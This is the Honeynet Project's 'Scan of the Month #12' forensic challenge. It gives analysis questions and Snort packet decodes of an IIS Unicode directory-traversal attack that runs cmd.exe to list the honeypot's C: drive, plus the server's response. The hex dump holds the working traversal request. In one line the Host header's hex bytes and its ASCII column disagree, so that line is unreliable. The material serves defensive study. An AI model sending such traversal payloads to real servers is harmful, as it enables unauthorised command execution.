# # SCAN OF THE MONTH #12: February, 2001 # # Challenge to see who can determine which tool was used # and the purpose of this attack. Packet decodes using snort # (http://www.snort.org). # # The packets were captured from the wild as part of the # Honeynet Project, http://project.honeynet.org QUESTIONS: ---------- Below is a specific probe/exploit ran against our honeypot, 172.16.1.106. As you read through these signatures, the challenge is to answer the following questions: ### QUESTION 1: What is the operating system of the honeypot, how do you know? ### QUESTION 2: What is the name of this attack? ### QUESTION 3: What is the attack attempting to accomplish? ### QUESTION 4: How does the attack work? BONUS QUESTION: Is it possible to gain remote control of the system using this technqiue? If so, how? SIGNATURES: ----------- ### Network Capture -*> Snort! <*- Version 1.7 By Martin Roesch (roesch@clark.net, www.snort.org) Exiting... lisa $more tmp.txt --== Initializing Snort ==-- TCPDUMP file reading mode. Reading network traffic from "snort-1226@0006.log" file. snaplen = 1514 --== Initialization Complete ==-- 12/26-07:06:00.871327 128.173.37.135:1443 -> 172.16.1.106:80 TCP TTL:13 TOS:0x40 ID:34723 IpLen:20 DgmLen:44 DF ******S* Seq: 0x2BDC106 Ack: 0x0 Win: 0x2000 TcpLen: 24 TCP Options (1) => MSS: 1460 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 12/26-07:06:00.872760 172.16.1.106:80 -> 128.173.37.135:1443 TCP TTL:127 TOS:0x0 ID:13343 IpLen:20 DgmLen:44 DF ***A**S* Seq: 0x1CB9F185 Ack: 0x2BDC107 Win: 0x2238 TcpLen: 24 TCP Options (1) => MSS: 1460 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 12/26-07:06:01.109979 128.173.37.135:1443 -> 172.16.1.106:80 TCP TTL:13 TOS:0x40 ID:35235 IpLen:20 DgmLen:40 DF ***A**** Seq: 0x2BDC107 Ack: 0x1CB9F186 Win: 0x2238 TcpLen: 20 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 12/26-07:06:01.155349 128.173.37.135:1443 -> 172.16.1.106:80 TCP TTL:13 TOS:0x40 ID:35491 IpLen:20 DgmLen:493 DF ***AP*** Seq: 0x2BDC107 Ack: 0x1CB9F186 Win: 0x2238 TcpLen: 20 47 45 54 20 2F 6D 73 61 64 63 2F 2E 2E C0 AF 2E GET /msadc/..... 2E 2F 2E 2E C0 AF 2E 2E 2F 2E 2E C0 AF 2E 2E 2F ./....../....../ 77 69 6E 6E 74 2F 73 79 73 74 65 6D 33 32 2F 63 winnt/system32/c 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 72 2B 63 3A md.exe?/c+dir+c: 5C 20 48 54 54 50 2F 31 2E 31 0D 0A 41 63 63 65 \ HTTP/1.1..Acce 70 74 3A 20 69 6D 61 67 65 2F 67 69 66 2C 20 69 pt: image/gif, i 6D 61 67 65 2F 78 2D 78 62 69 74 6D 61 70 2C 20 mage/x-xbitmap, 69 6D 61 67 65 2F 6A 70 65 67 2C 20 69 6D 61 67 image/jpeg, imag 65 2F 70 6A 70 65 67 2C 20 61 70 70 6C 69 63 61 e/pjpeg, applica 74 69 6F 6E 2F 76 6E 64 2E 6D 73 2D 65 78 63 65 tion/vnd.ms-exce 6C 2C 20 61 70 70 6C 69 63 61 74 69 6F 6E 2F 6D l, application/m 73 77 6F 72 64 2C 20 61 70 70 6C 69 63 61 74 69 sword, applicati 6F 6E 2F 76 6E 64 2E 6D 73 2D 70 6F 77 65 72 70 on/vnd.ms-powerp 6F 69 6E 74 2C 20 2A 2F 2A 0D 0A 41 63 63 65 70 oint, */*..Accep 74 2D 4C 61 6E 67 75 61 67 65 3A 20 65 6E 2D 75 t-Language: en-u 73 0D 0A 41 63 63 65 70 74 2D 45 6E 63 6F 64 69 s..Accept-Encodi 6E 67 3A 20 67 7A 69 70 2C 20 64 65 66 6C 61 74 ng: gzip, deflat 65 0D 0A 55 73 65 72 2D 41 67 65 6E 74 3A 20 4D e..User-Agent: M 6F 7A 69 6C 6C 61 2F 34 2E 30 20 28 63 6F 6D 70 ozilla/4.0 (comp 61 74 69 62 6C 65 3B 20 4D 53 49 45 20 35 2E 30 atible; MSIE 5.0 31 3B 20 57 69 6E 64 6F 77 73 20 39 35 29 0D 0A 1; Windows 95).. 48 6F 73 74 3A 20 6C 61 62 2E 77 69 72 65 74 72 Host: lib.bvxttr 69 70 2E 6E 65 74 0D 0A 43 6F 6E 6E 65 63 74 69 ip.org..Connecti 6F 6E 3A 20 4B 65 65 70 2D 41 6C 69 76 65 0D 0A on: Keep-Alive.. 43 6F 6F 6B 69 65 3A 20 41 53 50 53 45 53 53 49 Cookie: ASPSESSI 4F 4E 49 44 47 51 51 51 51 51 5A 55 3D 4B 4E 4F ONIDGQQQQQZU=KNO 48 4D 4F 4A 41 4B 50 46 4F 50 48 4D 4C 41 50 4E HMOJAKPFOPHMLAPN 49 46 49 46 42 0D 0A 0D 0A 41 50 4E 49 46 49 46 IFIFB....APNIFIF 42 0D 0A 0D 0A B.... ### Session Breakout file ids# $more SESSION:1443-80 HTTP/1.1 200 OK Server: Microsoft-IIS/4.0 Date: Tue, 26 Dec 2000 13:05:30 GMT Connection: close Content-Type: application/octet-stream Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of c:\ 11/26/00 12:34p 0 AUTOEXEC.BAT 11/26/00 06:57p 322 boot.ini 11/26/00 12:34p 0 CONFIG.SYS 12/07/00 03:30p InetPub 12/07/00 03:12p Multimedia Files 12/20/00 05:13p 78,643,200 pagefile.sys 12/21/00 08:59p Program Files 12/21/00 08:59p TEMP 12/20/00 05:14p WINNT 9 File(s) 78,643,522 bytes 1,779,191,808 bytes free